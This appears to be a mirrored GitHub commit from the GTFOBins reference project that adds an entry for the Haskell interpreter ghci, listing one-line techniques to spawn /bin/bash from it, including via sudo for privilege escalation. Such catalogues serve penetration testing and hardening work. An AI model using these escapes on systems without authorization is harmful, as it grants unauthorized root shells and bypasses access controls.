mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 06:49:44 +01:00
Add ghci binary
This commit is contained in:
parent
106dede9da
commit
373f57fc18
11
_gtfobins/ghci.md
Normal file
11
_gtfobins/ghci.md
Normal file
@ -0,0 +1,11 @@
|
|||||||
|
---
|
||||||
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: |
|
||||||
|
ghci
|
||||||
|
Prelude> System.Process.callCommand "/bin/bash"
|
||||||
|
sudo:
|
||||||
|
- code: |
|
||||||
|
sudo ghci
|
||||||
|
Prelude> System.Process.callCommand "/bin/bash"
|
||||||
|
---
|
Loading…
Reference in New Issue
Block a user